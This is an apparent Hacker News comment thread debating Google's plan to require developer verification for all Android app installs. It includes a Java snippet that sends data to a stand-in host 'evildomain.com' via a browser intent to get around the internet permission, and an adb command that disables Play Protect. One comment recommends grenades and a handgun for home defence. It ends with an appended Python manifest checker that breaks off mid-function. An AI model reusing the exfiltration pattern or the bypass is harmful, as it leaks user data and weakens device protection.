I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it. But even if it is flawed, don't you think Google would be a bit more incentivized to make the Internet permission work as expected if people could disable it?
GuB-42 · 1h ago
> I've never managed to find even a single PoC bypassing it
> I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it.
Uri uri = Uri.parse("https://evildomain.com/upload?data=DATA_GOES_HERE");
Intent i = new Intent(Intent.ACTION_VIEW, uri);
startActivity(i);
Happily uses the browser app to do the data send for you. Requiring apps to have all the permissions of the recipient of an Intent before being allowed to send it would be a catastrophic change to the ecosystem.
broker354690 · 1h ago
> would be a catastrophic change to the ecosystem.
Hey we were already on board with this, you don't have to convince us.
UncleMeat · 27m ago
The effect of this would be to make all apps request all permissions because even if you are just using some other app for a particular feature you need, you have no control over what other permissions they might add which would suddenly break any intents you send them. The only defense would be to request everything.
You could very specifically ban ACTION_VIEW intents for web URIs from apps without an internet permission I guess. But does banning apps from linking to the web (to be opened in browsers) really seem like a good idea?
zrobotics · 2h ago
I mean, I just did a quick look over the installed apps on this phone and ~1/4 of them would work perfectly well without an internet connection, things like a level or GPS speedometer that use the phone sensor or apps for Bluetooth control of devices [like 0] . Why would something like a bubble level app need internet access for anything besides telemetry or ads? I realize I have way more of these types of apps than the average user, but apps like this aren't a super-niche thing that would be on 0.1% of devices.
I just tend to give Google little benefit of the doubt here, considering where their revenue comes from. Same as when they introduced manifest v3, ostensibly for security but just conveniently happening to neuter adblocking. Disabling access to the internet permission for apps aligns with their profit motive.
chenxiaolong · 4h ago
If this is enforced via Play Protect, then the whole mechanism can likely be disabled with:
adb shell settings put global package_verifier_user_consent -1
This does not require root access and prevents Android from invoking Play Protect in the first place. (This is what AOSP's own test suite does, along with other test suites in eg. Unreal Engine, etc.)
I personally won't be doing this verification for my open-source apps. I have no interest in any kind of business relationship with anyone just to publish an .apk. If that limits those who can install it to people who disable Play Protect globally, then oh well.
mzajc · 2h ago
How long until Google decides to lock it down because "scammers" can "abuse" it?
prism56 · 3h ago
What does this break?
chenxiaolong · 3h ago
There shouldn't be any side effects other than rendering Play Protect inert. No other AOSP component relies on this setting.
zozbot234 · 3h ago
There could of course be side effects in the future when this restriction is rolled out, as in your device's Play Integrity status could be affected and your banking app/phone wallet might not let you perform app-based payments from that device.
ezconnect · 1h ago
Some bank apps and payment processors already check if you have developer mode on and refuse to run.
Oh, yes... Actually I remember: it was a long slow series of accepting small artificial restrictions. I remember people laughing at me at the time. They said it won't matter, they didn't care, that I was paranoid...
Now... Here we are.
WorldPeas · 1h ago
and don't forget all the people with the dismissive remarks about how it didn't affect them on their Graphene or Calyx phones. We're all downstream of something. The real product of Android for us was always the interoperability with the normal world for the tinkerer.
beeflet · 7m ago
eternal september
mrlatinos · 59m ago
We had no part in this. The blame lies squarely with Google and its employees, who trade away user freedom for profit and career gain. Many who are smart enough to know better but instead compromise their principles. It's just another symptom of late-stage capitalism.
PokedBear · 3h ago
It will be interesting to see how they handle packages from the various f-droid repos. F-droid builds and signs all their apps themselves, so will all of f-droid be covered by a single signing key and developer account? Or will the fact that they take apps from lots of folks bar them from an account?
black3r · 3h ago
F-Droid generates a unique key for each app and that key is then reused for all builds of that app. This will probably just require registering the F-Droid public key to the package name with Google.
logicchains · 3h ago
I'd bet money they'd just ban them; the whole point is to stop users running unapproved applications on their phones.
DangitBobby · 3h ago
Unless I misunderstood the question, this is covered in TFA
> The tech giant stresses that this does not mean developers can’t distribute outside of the Play Store through other app stores or via sideloading — Android will remain open in that regard.
vetrom · 2h ago
You have misunderstood the question, or perhaps buried the lede. 'Open in that regard' is tantamount to not open at all. If you gatekeep being able to load an app to an Android phone behind these processes, you're essentially stuck with no recourse if you, say, have a banned google account, or have some reason you don't wish to send your government ID to these companies.
donmcronald · 2h ago
It also makes sure you only get one ID for life. There’s no creating a second account if you get banned because they’ll (likely at some point) collect biometric data as part of the verification process.
These big companies need to be broken into a thousand pieces. They’re starting to become the gatekeepers of participating in society.
throw-the-towel · 1h ago
Who's going to break them down? The governments also want this.
DangitBobby · 2h ago
I was responding to this:
> I'd bet money they'd just ban them; the whole point is to stop users running unapproved applications on their phones.
I wasn't trying to claim everything is hunky dory, just that they aren't "going to just ban" other app stores.
MostlyStable · 2h ago
How does that jive with this statement:
>The Play Store implemented similar requirements in 2023, but Google is now mandating this for all install methods, including third-party app stores and sideloading where you download an APK file from a third-party source.
DangitBobby · 2h ago
Does that amount to "just ban[ning]" other app stores? If not then... it jives fine? Not here to say it's a good thing.
hyperhopper · 2h ago
Your own quote shows the source of the confusion. OC was asking how will google handle apps that have somebody else signing for them. Your quote talks about letting devs that go through a verification process still side load (though that has no real benefit at that point since google still holds control over you)
cesarb · 2h ago
The reason I chose the Android ecosystem over the Apple ecosystem, once I found out that the Maemo/Meego ecosystem was a dead end and the Openmoko ecosystem was a non-starter, is that the Android ecosystem allowed me to develop and install my own apps on my own devices whenever I wanted to, without arbitrary limitations like having to periodically plug the phone into my computer to renew some authorization. Additionally, there was even for some devices the possibility of rebuilding the whole operating system with any changes I desired.
If I'm not allowed to develop and install my own apps on my own phone, what advantage does Android have over Apple?
coastalpuma · 1h ago
We shouldn't accept "sideloading" as a term. It's meant to make "installing an app without monopolist approval" seem like a dirty/weird/niche trick.
Google can't even stop the scam ai companion apps on the play store that all use the same backend full of characters...
Google also can't stop the huge wave of scam Bitcoin ads impersonating Canadian media outlets, with ai generated pictures and videos of politicians.
Get real Google.
climb_stealth · 38s ago
Don't get me started. Every single app I search for on the play store gets a first sponsored result that is a completely different app. It is so utterly broken by design.
PRSXFENG · 1h ago
Their own store has a dozen "AI Photo Editor Pro 2026" and "Turbo Deluxe Ultra VPN Secure Pro" apps that are "approved" and yet for sure have malware at worst and at best steal your data and serve nonstop pop up ads
seanw444 · 2h ago
Makes sense why they had to get rid of the "don't be evil" motto. They've been on a roll.
I've seen a lot of similar sentiment on this thread, but the reason I use Android is because it gives me more control than iOS by allowing full-on painless sideloading, and custom distributions like GrapheneOS. They're doing everything they can to turn themselves into a worse Apple. All of the downsides of Apple, but none of the upsides. Apple beats them in every aspect that isn't "openness".
When will the straw break the camel's back? I'm shocked we've let it get to this point with no realistic alternatives. There's no reason a competitive Linux-based smartphone can't exist (no, I'm not counting Android in that).
IlikeKitties · 1h ago
> There's no reason a competitive Linux-based smartphone can't exist (no, I'm not counting Android in that).
Yes there is. You all don't understand that they will use remote attestation to force everyone to use approved devices with signed apps on signed OSes only
You won't be able to bank, call a cab, write a chat message, watch a youtube video or do anything relevant on a device anymore that isn't signed, approved and controlled by google. They've made us cattle and now they are going to milk us dry.
cesarb · 1h ago
> There's no reason a competitive Linux-based smartphone can't exist
There is; it's the "phone" part of "smartphone". Being a phone makes the device subject to a lot more requirements (for an obvious example, emergency dialing must always be available and work, and at the same time the phone must never accidentally dial the emergency number).
In my country, only cell phones certified by the government telecommunications agency (Anatel) can be imported, so I can't for instance go to the Jolla or PinePhone store and buy a Linux-based smartphone; if I tried, it would be sent back the moment the package entered the country. (See https://www.gov.br/anatel/pt-br/regulado/certificacao-de-pro... for details.)
nicce · 2m ago
> There is; it's the "phone" part of "smartphone". Being a phone makes the device subject to a lot more requirements (for an obvious example, emergency dialing must always be available and work, and at the same time the phone must never accidentally dial the emergency number).
Funnily, Google is one of the few phone manufacturers who can’t make emergency calls work. (e.g. search Pixel problems)
Yokolos · 4h ago
> Google notes “supportive initial feedback” from government authorities and other parties:
Ah, then I guess everything is fine. I'm sure they aren't in favour because it gives governments greater control over what apps we're allowed to have on our phones. That would be absurd.
jajuuka · 2h ago
I feel like that makes the most sense. That this isn't something Google thought up but something that the EU wanted to ensure its government ID app was "safe". Google does benefit but the timing seems to line up.
hollow-moe · 4h ago
They saw Apple getting away with notarization under the DMA so they're doing the same.
I must admit the mass demotivation strategy is working really well. Seeing this kind of news every single day, affecting you directly and not even being able to do anything
NelsonMinar · 3h ago
Android's ability to run binaries outside of the Google Play Store is a key differentiator of their product vs. Apple's. Or at least it used to be.
jajuuka · 2h ago
I think this is another thing that has changed in time. Custom ROMs used to be the defining feature of Android but over time fewer and fewer people used them. I think sideloading has gotten to that point as well. Where it's a power user feature that most people don't touch. So Google feels confident in nixing it since it only affects a small group of people.
fluoridation · 1h ago
Fewer people use custom ROMs not necessarily because they don't want to, but because manufacturers began putting hardware on the phones that only they have the firmware for. I have a Samsung phone that I replaced as my daily driver because the phone speaker broke from sweat. Other than the speaker it works literally perfectly. I'd love to use it to try different alternative OSs, but AFAIK, even though it's only from 2021, not a single project supports it.
zrobotics · 1h ago
I mean, the Epic Games lawsuit specifically involved sideloading. There's still ongoing litigation in one of those suits. Playing Fortnite isn't exactly a niche or power user thing.
RadiozRadioz · 2h ago
Unfortunately, it's not a differentiator at all in the market. Not to enough consumers that it remotely matters. For our niche nerdy subculture it's extremely important, but essentially nobody in the grand scheme of things even knows that binary is a thing that exists.
GZGavinZhao · 1h ago
Still is, all of those Chinese ROMs/phone manufacturers thriving because of this. The Chinese phone market would literally be non-existent if it weren't for the ability to run binaries outside of Google Play.
Zak · 5h ago
The core benefit of Android over iOS for me has always been that it's my device, not Google's.
They've been chipping away at this over the years. Safetynet was the first offense, but if they start restricting app installation from sources of my choice (I hate the term "sideloading"), there's not much advantage left.
gpm · 3h ago
Google is doing everything in their power to make me move to an iphone... between shit like this, effectively bricking some old models of pixels with un-rollbackable patches that destroy batteries, closing down the android development process, making absurd testing requirements to publish apps, etc.
Google doesn't make better phones, they were just less hostile to the consumer. That seems to be going away :(
thayne · 3h ago
As mentioned in OP, Apple is doing the same thing.
gpm · 3h ago
I'm aware, I'm saying Google is trending towards being as abusive with their software practices as Apple already is, not worse.
And saying that for me anyways the only reason I have an Android and not an iPhone is because they were less abusive. On unrelated metrics like hardware quality Apple generally seems to do better.
delfinom · 45m ago
Apple's hardware quality is pretty solid. Using Apple's software is basically an exercise in being a sub.
I have a stroke every time I try to navigate settings on an iPhone each time someone asks. It's like they don't want you to try and change anything, ever.
ryukoposting · 2h ago
Precisely. If I can't control what I put on my Android phone anymore, I no longer have any reason to use an Android. iPhones have normal USB ports now, and that was the other big barrier.
Klonoar · 2h ago
> Google doesn't make better phones, they were just less hostile to the consumer.
And the person you're responding to was pretty clear that the issue is that if they both do the same thing, Google has no edge in devices.
celsoazevedo · 1h ago
If both systems are similar in terms of features and freedom, then I might as well choose the one that tracks me less and offers a more polished experience.
throw_m239339 · 2h ago
> As mentioned in OP, Apple is doing the same thing.
The thing is that if Google chooses to make Android OS as closed as iOS, I'd rather use an iPhone than an Android phone...
james2doyle · 3h ago
Wasn’t Apple the one actually caught throttling devices with an update to slow phones down under the guise of "saving battery"?
Leaving Google for Apple, and expecting a more open app store, is going to be disappointing. I’m not a Google fanboy by any means, just pointing out the landscape out there
tgsovlerkhgsel · 3h ago
Apple throttled devices that had a weak battery, because the alternative is the CPU trying to draw more power than the battery can deliver, the voltage sagging, and the phone rebooting.
By itself, this throttling is a good thing and keeps phones usable for longer, because a phone that is slow is better than a phone that randomly reboots.
The problematic part was that they a) didn't disclose it, and b) did this for phones within the warranty period, so instead of the phone visibly crashing and you returning the obviously broken phone, it just lost performance which you might not have noticed in time to get a free replacement.
GeekyBear · 2h ago
The Nexus 6P had the same issue with random shutdowns, and although Google refused to do anything about it some users on XDA developed a patch that disabled all the performance cores completely.
> XDA user XCnathan32, along with assistance from two other users, created the fix and put it up for anyone to give it a whirl. Without getting too technical, the fix shuts down all four of the Nexus 6P octa-core Snapdragon 810 processor’s performance cores that seemingly prevent the phone from properly booting
Funny how no one really complained about the random reboots but everyone noticed throttling and assumed their phone was "too old" and they needed to buy a new one. Interesting how this move greatly benefited Apple's bottom line versus improving actual quality of life for the user considering a reboot is 30 seconds perhaps and a slow phone is slow for every second you use it.
james2doyle · 2h ago
Understood. Poor wording on my part!
nicce · 3h ago
> Wasn’t Apple the one actually caught throttling devices with an update to slow phones down under the guise of "saving battery
It wasn’t a guise, it actually increased the battery life quite much. People complained about the battery of old phones. The problem was that users did not have a choice to opt-out.
makeitdouble · 2h ago
There was the opt-out part, but also the complete silence around the issue that comforted people into thinking they needed new phones every 2 years instead of just replacing the battery.
Apple wouldn't have had to do all the song and dance if from the start a popup warned the users their battery lost capacity and should be serviced.
to11mtm · 2h ago
> Wasn’t Apple the one actually caught throttling devices with an update to slow phones down under the guise of "saving battery"?
It's not about 'saving battery', it's about preventing undervoltage that janks everything up.
Having dealt with more than one windows phone that didn't have this feature or had it in a bad way (i.e. 520/521 would just 'reboot', 640 and 950XL would just kill an app) I wish Microsoft would have figured that crap out lol.
GeekyBear · 3h ago
> Wasn’t Apple the one actually caught throttling devices with an update to slow phones down under the guise of "saving battery"?
Nope. There was an issue in iPhones and Nexus phones that had been used for a few years where a worn battery could no longer maintain a voltage high enough to meet instantaneous SOC power demand, resulting in unexpected device shut downs.
Apple got the device to quit shutting off without warning by throttling older devices and Google did nothing and just told users to buy a new device.
They both got sued, and both lost.
> If you currently or formerly owned a Google Nexus 6P smartphone, we have some good news: you might be eligible for a cash rebate for those bootloops and spontaneous shutdowns the device was known for.
It's not a bug or issue with those phones, it's how batteries behave -- over time, they lose both their capacity and the power they output. Apple decided to throttle their phones via software instead of letting them crash.
I've said this before, but it was the right idea executed the wrong way. iPhones give you a warning when they overheat, and this throttling should have gotten a similar warning with a link to an FAQ explaining the battery dynamics.
Manuel_D · 3h ago
No, the batteries had degraded to the point that they could not supply enough voltage and current to stably run the chip at full frequency. Replacing the battery would restore full performance.
zaphirplane · 3h ago
> Wasn’t Apple the one actually caught throttling devices with an update to slow phones down under the guise of "saving battery"?
That’s not a true story.
croes · 3h ago
Is sideloading a thing on iOS?
jajuuka · 2h ago
Yep, available to anyone. It's much more restrictive though. Basically you need a valid developer certificate to sign apps. You can use your own with a free developer account but you only get so many tokens per week and apps need to have their tokens refreshed weekly.
You can also use an enterprise developer certificate that lasts forever but if Apple revokes it then the app stops working until you get another working cert.
It does require you to turn on iOS developer settings by connecting to a Mac with Xcode installed to enable but then you can manage app installation and refreshing via an App Store like Alt Store. EU has different system where there is no limit on amount of sideloadable apps but the apps still need to be approved by Apple. Alt Store also have a EU specific App Store for that purpose.
I side loaded on iOS for a long time. Get Youtube++ for ad free and I forget the Reddit client I used that was side loaded as well. You can run the server on any PC or Mac that will handle side loaded apps and being on the same WiFi network allows the server to automatically refresh the installed apps. Only big downside is updates are not automatic or simple. To update an app you have to download the new app .ipa and then sign it like you were installing it fresh. Usually it picks up the existing configs and data though. So it's not a full app wipe.
The sideloaded subreddit is where I got into it through.
Zak · 3h ago
In legal jurisdictions where Apple is forced to allow it, yes. They have a similar scheme for requiring developers to register and are demanding per-install fees for popular apps, though I'm not sure that will survive regulatory scrutiny in the EU.
Otherwise, I think it's possible to use developer tools to temporarily install apps on an iPhone. IIRC this requires a Mac and has to be repeated every few days.
nicce · 3h ago
> and has to be repeated every few days.
7 days for free account.
1 year for paid (until membership ends?).
90 days for TestFlight.
miladyincontrol · 2h ago
Worth adding on there are methods to update signatures, altstore being one example
Although using their app to help automate that then takes up one of the app slots for free accounts
viktorcode · 3h ago
There's a technical possibility, but it's not a thing, as in there's not a lot of iPhone users interested in that
kachapopopow · 3h ago
Yes******
* Only in europe
** kinda
*** you have to enable it in your account settings
**** you have to reinstall it every 30 days
***** more I forgot
****** fuck you - apple
kykat · 4h ago
What was the last time there were some actually good news in big tech? For those that don't hold stocks I mean.
cesarb · 1h ago
> What was the last time there were some actually good news in big tech?
The issue is that the good news are often incremental, while the bad news come in large steps, which makes them much more noticeable.
hnpolicestate · 4h ago
We're in the era of less control, more surveillance, more "security", more being treated like a child and lied to.
Just yesterday I got a venmo prompt to add biometrics for "security". F off.
donmcronald · 2h ago
I had to do a government ID upload and a live face scan to install my banking app on a new phone even though I had other devices I could have used to authorize it. It made me want to switch banks, but where do you go?
ohdeargodno · 37m ago
For what it's worth, Venmo will not get access to your biometrics data, it's a black box in which you specify a desired level of authentication and the OS just returns ok/not ok.
It is, however, to make you use Venmo more easily, thus more often, thus spend more money through them.
donmcronald · 2h ago
Last week. The bags I’m holding for Intel got a little lighter. Lmao.
Dragon0 · 1h ago
DO NOT UPLOAD YOUR ID/INFO TO GOOGLE. I put my game on their app store some years ago, and they doxxed me right on the app store. Google posted my name and home address right on the game page. Not great when I was already receiving death threats! Later on, had a rando show up at 3AM one night and had to call the cops out. I moved after that. Google is absolutely not to be trusted to keep this data confidential. If Google demands I do anything with them, I'll just tell my fans to install lineageos or whatever instead -- no way in hell I'm having ANYTHING to do with google ever again. GFY google!
greenavocado · 1h ago
If you are having random people try to attack you while you are at your home, you need to be prepared. Strengthen your door jambs with nine inch screws to replace the screws your door is mounted to and use metal plates to strengthen the locks (there are kits available at home improvement stores), install adherent plastic frosting on your windows that will slow down break ins by making the window much more annoying to break through, and install surveillance cameras outdoors. On the offensive front, you can consider OC/CS grenades you can throw down the hallway to avoid exposing yourself and handheld pepper spray for non-lethal deterrence at moderate range. Finally, if all else fails, keep a loaded handgun in an easy to use but hard for kids to unlock gun box under your drawer next to your bed. An under barrel flash light severely blinds invaders and makes them think twice about charging you, maximizing the chances that nobody will get hurt. The door jamb upgrade is the most important one. I have returned home to a severely beaten door with my shattered iron door knocker on the ground laying in front of the door in pieces but the house was impenetrable to the burglar(s) who weren't willing to break through the glass. It also doesn't hurt to install fake $5 security dome cameras around the property.
steve_taylor · 1h ago
Or just don't give your home address to Google.
fluoridation · 57m ago
What do you mean by "Google posted my name and address"? How? Why?
jadamson · 47m ago
If your app is monetized, the contact details of your "business" are shown in the play store. For many smaller developers, this will just be their home address.
I cannot resist the urge to point out that we wouldn't have had this problem if people actually stuck to free software instead of "commercial use friendly" open source licensing
merelysounds · 1h ago
In practice we see the reverse and GPL projects being rewritten as more permissive.
The busybox/toybox case looks especially relevant and interesting:
> In January 2012 the proposal of creating a BSD license alternative to the GPL licensed BusyBox project drew harsh criticism (…). Rob Landley, who had started the BusyBox-based lawsuits, responded that this was intentional, explaining that the lawsuits had not benefited the project but that they had led to corporate avoidance, expressing a desire to stop the lawsuits "in whatever way I see fit".
Such a shame that the Free Software Foundation has been such an awful steward of the GPL. The fact that the GPLv3 didn't close the network hole is a decision made either out of myopia or abject cowardice, you shouldn't need a separate license (AGPLv3) to ensure true freedom of the codebase.
josephcsible · 20m ago
Sure, but just the regular GPLv3 would have been good enough to prevent this particular abuse.
asdff · 2h ago
Free choice in the market is a lie anyhow. You are limited by what has actually been made available in the marketplace in sufficient quantity. "You can have any color you want, so long as it is black." - some old racist industrialist.
tannhaeuser · 44m ago
Except Android is based on Linux.
pbasista · 2h ago
An interesting idea. But who would have to "stick" to such software? The users?
It seems to me that most of the users do not care much about what kind of software their phone runs, unfortunately. As long as it works with Instagram or whatever other big brand social media is trending these days, they are happy. Which is I think understandable.
The companies developing the apps are in my opinion driving this cultural shift. And they are doing it mostly because it brings them commercial advantages. Which is, I think, also understandable.
Everyone involved seems to do what appears to be in their best interest. And yet, collectively, we as a society get a worse outcome overall. This phenomenon perhaps has a name.
In order to break out of it, I think that the incentives on both sides need to be adjusted. It needs to be in the companies' interest to produce apps as open source. And the users need to want them.
The only way I can think of to achieve that kind of a change is when the open source apps and products become just inherently better than their proprietary alternatives. In all categories. Then, the people would want them. And then the companies will start to produce them.
It is a very tough goal. The commercial apps do not have to be better in all categories to retain their users. They can use vendor locks or other business strategies which restrict the users' ability to leave them.
Open source apps cannot do such things. The only fair ground on which they can compete is their quality.
ycombinatrix · 4h ago
This is crazy. I can't install my own apps on my own phone anymore.
I am gonna start carrying around a laptop with a 5G modem instead.
dingdingdang · 3h ago
I'm thinking it's time for a 2nd phone (in my case old one from cupboard) to become the regular daily GrapheneOS enabled driver and then keep a modern Google(tm) updated one at home for all the "official crap" whenever needed. That way I can also separate banking / paypal / etc. from my carry phone with all its various apps that I trust to varying degrees.
donmcronald · 2h ago
This was the first thing that crossed my mind. If it’s not too much money and hassle I could buy a second device for GrapheneOS and tether to the cheapest phone I can get for the official ecosystem.
Really though, it doesn’t have enough impact for consumers. If I get unfairly banned as a developer, no one even notices because that’s nothing more than an opportunity for another developer to step in.
Individually we have no power :-(
A4ET8a8uTh0_v2 · 1h ago
Those are the moments I am starting to fantasize about starting a customer protection group that is sufficiently committed to follow through on organizing boycotts. Naturally, reality hits once you see average human on the road ( on a highway, full speed ). We might be lost a species.
UnreachableCode · 2h ago
I'm curious why you need a phone for banking at all, at home as you say. Wouldn't a laptop suffice? Granted, not all banks have a web app these days
reorder9695 · 2h ago
Not for me at least, 3DS requires approval in an app on my phone. I'd love if the banks just used TOTP instead but no, I have to use their app, some of which don't work with an unlocked bootloader, so I have to have stock android
GeoAtreides · 1h ago
ding ding ding a second phone is the correct answer
Tadpole9181 · 2h ago
Don't worry, they'll stop letting you access your bank without an app soon enough. Gotta protect the children and what-not.
dugite-code · 46m ago
I just got a letter from my bank stating this. Website is going away, app only access. It's very disappointing, for security I never have any banking access on my mobile devices
owebmaster · 1h ago
That's indeed what I'm planning to do but I'll buy a Steam Deck
zmmmmm · 2h ago
The worst part is the Orwellian opening sentence they start with in their blog post [0]:
> You shouldn’t have to choose between open and secure
2+2=5
Truly the end of an era. I've spent nearly two decades buying Android phones because of a single checkbox in settings that let me have the freedom I consider essential to any computing device that I own.
In a way, it's liberating, I've missed out on a lot from the Apple ecosystem because of that checkbox. Maybe finally I can let go of it now the choice is out of my hands.
Very much my exact feelings. I had the first Android phone ever and even wrote my own APKs and enjoyed the freedom of the mobile platform that let me install my own software. But it's been close to 20 years and maybe it's time to check out the other side, as much as I despise Apple's locked down ecosystem.
bpev · 3m ago
I see... I guess it's just... web apps then?
the_wolo · 1h ago
Yeah... They just want to ban NewPipe. It's sad to see Android getting locked down, also with the source closing of the development branches, etc. I can as well buy Apple then, it doesn't matter anymore.
9cb14c1ec0 · 4h ago
As a developer of android apps that get distributed outside of the Play store, a Google identity verification system sounds like a nightmare. What if I'm deemed to be politically incorrect? Will Google brand safety exclude me?
xenago · 1h ago
That's exactly the goal
sebastiennight · 2h ago
So what are our options (eg for EU citizens) for lobbying in terms of legislation or directly to Google to show disagreement with this?
It looks like many in this thread are against, but I don't see suggestions for action?
derbOac · 1h ago
I'm wondering the same thing in the US. Aside from writing Google and complaining, and purchasing a phone with a different OS (GrapheneOS or PureOS, for example), I'm not sure what else to do.
0x000xca0xfe · 4h ago
Time for a Steam Phone. Or FirefoxOS reloaded. The general purpose mobile computing market must be sizeable. I cannot believe everybody just puts up with these increasingly draconic restrictions.
CrimsonCape · 1h ago
A linux-based phone... with an 18650 battery slot... with a keyboard... and a meshtastic radio... drool.
int_19h · 33m ago
Phones are hard because of certification requirements.
I think a big problem is that the users have been trained to accept the status quo. I mean back in the Feature phone days we would share Java phone games at school via Bluetooth. I’d assume kids these days generally don’t anymore.
Also, due to the cost of physical media piracy was rampant even amongst boomers. People knew and had the option to buy a dvd player that could play video cd because that’s how movies were ripped.
Even during the early iPhones we were so stripped of even basic features that a jailbreak was 100% required if you wanted to do even basic things like taking videos or changing the Home Screen background.
None of this is necessary anymore. The user gets the phone and it just works from their perspective at least.
So who is going to try to run a business off of nerds like us who want to have this sort of control over our devices (I’d call it freedom but the average user doesn’t feel unfree)?
lucb1e · 1h ago
> we would share Java phone games at school via Bluetooth. I’d assume kids these days generally don’t anymore.
I am both happy (from a user-friendliness point of view) and sad (from a "works offline" perspective) that F-Droid's share button now shares a link that will show them info about the app with an option to install the software, instead of the share button directly giving you an APK file with no way to copy the 'store' page. I'd personally still know how to send people APKs via hotspot or bluetooth (such as for peer-to-peer voice/message apps) but a lot of people won't
This move from sending each other software to sending each other links to centralized platforms has been long ongoing. Most messaging systems don't allow you to send executable (.exe, .apk, .sh, etc.) files anymore. And I believe that virtually all of them individually do it for your own good, but the combined result is a societal shift
0x000xca0xfe · 3h ago
There has to be a threshold where enshittification has been pushed so far that nerd software becomes the thing cool kids boast about running.
Where a less restricted device can do cool things nobody else can do.
Retr0id · 3h ago
These days I don't really want a smartphone at all, but begrudgingly use one for things like mobile banking, receiving SMS tokens, etc.
If someone made a screenless powerbank-shaped Android device, I might be interested. The device would double as a 5g wifi modem, and to access the UI you'd remote in over VNC from a laptop, or unrestricted mobile device like a PinePhone.
WhyNotHugo · 3h ago
Sounds like you want a laptop with a built-in LTE modem running Android inside a VM.
Retr0id · 3h ago
A laptop is far too big, and banking apps and the likes would refuse to run in your VM.
A4ET8a8uTh0_v2 · 1h ago
Hmm, don't banking apps run in emulators without much hassle? I am seeing a project on a horizon lol.
metalman · 2h ago
The set up I run consists of an older 5g phone that hotspots to my other phone, no apps of consequence on either phone, I sign into my email through web mail, and sign into banking through a browser, all of my apps come from fdroid and similar, mostly used for media, manual updates for those through the fdroid web site.
As to the device you mention, it should be possible to take a phone apart and spoof* all of the mic's and cameras, likely the gps, and haptic motor and speakers as well, and have a 5g touch screen modem with plain internet, or keep the speakers and it's a media device, or put all the audio on a micro switch.
* use matched resistors, or black out the sensors
detach the antenna for gps
let's just say I really don't like being advertised to
zappb · 3h ago
Mobile phone platforms are reverting back to the pre-iOS/Android reality where you have to jump through tons of hoops to even make an app let alone run a viable business with it.
IshKebab · 3h ago
I don't recall having to send government ID to any companies to publish MIDlets back in the day. I just uploaded them to getjar.
int_19h · 31m ago
AFAIK in some countries (US?) phones were usually sold locked in a sense that you could only install J2ME midlets published by your mobile provider, who'd nickel and dime both users and devs for the privilege.
lykahb · 2h ago
I have good memories about a website with ELF's for the Siemens phones. Its name had "kebab" in it. By any chance, was it you running it?
majestik · 5m ago
Google welcome to Apple 10 years ago
mrbluecoat · 2h ago
> The requirement will go into effect in September 2026 for users in Brazil, Indonesia, Singapore, and Thailand. Google notes how these countries have been “specifically impacted by these forms of fraudulent app scams.” Verification will then apply globally from 2027 onwards.
At least most of the world has until 2027 to install LineageOS or GrapheneOS.
aucisson_masque · 2h ago
Apps are increasingly failing to run on grapheneos because Google is pushing for the play integrity verification. More and more apps, some critical like banking apps, some not at all, require your device to be running an official rom signed by Google.
3036e4 · 2h ago
So I will go back to carry two devices, I guess. Like when I had a Jolla Phone and an Android phone. Or before that with a Palm PDA and a dumbphone. It is convenient to have everything combined in a single device, but guess that turned out to be just a temporary luxury.
aucisson_masque · 2h ago
Great for you. What about the normies ? You know the people that protest and make things change, how they are going to organize themselves when their government gets authoritarian and apple/google obeys to governments request to forbid some app. You know like what happened during Hong Kong protest with Apple App Store.
I’m not saying I have a solution but looking at yourself and pretending it’s all fine because you’re 10 times more tech savvy than the average citizen isn’t a viable answer. That kind of issue must be solved by regulation, hopefully Europe gets to bring back on earth whoever at Google agreed on that idea.
int_19h · 28m ago
It's not "all fine", but realistically it's the best that you can hope to achieve.
The "normies" won't protest because it mostly doesn't affect them, at least not in any direct and obvious way that would trigger a pushback.
Regulation is unlikely to give you what you want. For one thing, regulators love centralization in general because it makes it much easier to regulate - when there are only a few large players, you can write the laws around them, effectively forcing them to be the enforcers. A large and diverse field where users can install whatever apps from wherever is much harder to regulate wrt things like banning porn or violent games or whatever it is that "normies" feel upset and demand that SOMEONE DO SOMETHING ABOUT IT!!!1! today.
This isn't to say that you shouldn't try to use political tools. Just be very clear that what you're trying to achieve is a minority take, and therefore you're unlikely to actually reach the goal in a democracy; at best, you will move the needle very slightly.
So, if you want to actually enjoy freedom in the meantime, learn how to be a criminal.
Night_Thastus · 2h ago
>At least most of the world has until 2027 to install LineageOS or GrapheneOS.
Which only work on a tiny, almost insignificant sub-set of phones. If you don't have one of those, you're screwed.
Not to mention the bootloader is getting locked down so you can't even install one of these in the first place.
A4ET8a8uTh0_v2 · 1h ago
So I guess now is the time to decide whether Pixel is actually something I would want to purchase from Google (and support the decision they just made with cash money) or... what exactly. I am not an Apple fan either.
moogly · 3h ago
Well, I guess I didn't want to use half of the apps on my phone anyway.
Might as well throw the phone in the bin.
sitkack · 2h ago
This is crazy, this means 10 years from now only terrorists will distribute software. Unacceptable! How many platforms now allow one to build and distribute a binary?
malkia · 4h ago
What would happen to projects like F-Droid, Termux, etc.?
gruez · 4h ago
Taking the article at face value, they'll have to register with google and have their apps be signed. Presumably this is subject to less review than the play store (eg. you don't have to justify your permissions list or whatever[1]), but there's no guarantees that developers will bother with the hassle. A lot of developers are willing to put some release up on github, but not dox themselves to google.
Guess whether the makers of alternative YouTube clients will want to tell Google, "Hey, this is a copy of our ID card, our address"...
grizzles · 1h ago
This must be because of Epic's win in antitrust court.
What someone needs to do is create a "Store" browser that loads apps from random websites like https://site.tld/app.apk
You could manually parse AndroidManifest.xml and allow only apps that expose <uses-permission android:name="android.permission.INTERNET" />
I'm somewhat interested in doing this myself actually. What do people think?
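A sketch of the permission gate proposed in the comment above, as an added example that is not part of the original post or of any existing store. It reads the idea as "accept only apps that request no permission other than INTERNET", and it assumes the manifest has already been decoded from the APK's binary XML into text (for instance with apktool); the function name, policy constants and sample manifests are constructed for illustration.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME_ATTR = f"{{{ANDROID_NS}}}name"
SHARED_UID_ATTR = f"{{{ANDROID_NS}}}sharedUserId"

# Policy assumed for this example: INTERNET and nothing else.
ALLOWED_PERMISSIONS = frozenset({"android.permission.INTERNET"})

# Both elements request permissions; checking only the first would miss
# requests that apply on API 23 and later.
PERMISSION_TAGS = ("uses-permission", "uses-permission-sdk-23")


def review_manifest(manifest_xml: str) -> tuple[bool, list[str]]:
    """Return (accepted, reasons). Anything unexpected fails closed."""
    # A manifest never needs a DTD; refusing one avoids entity-expansion
    # tricks against the XML parser when the input is untrusted.
    if "<!DOCTYPE" in manifest_xml or "<!ENTITY" in manifest_xml:
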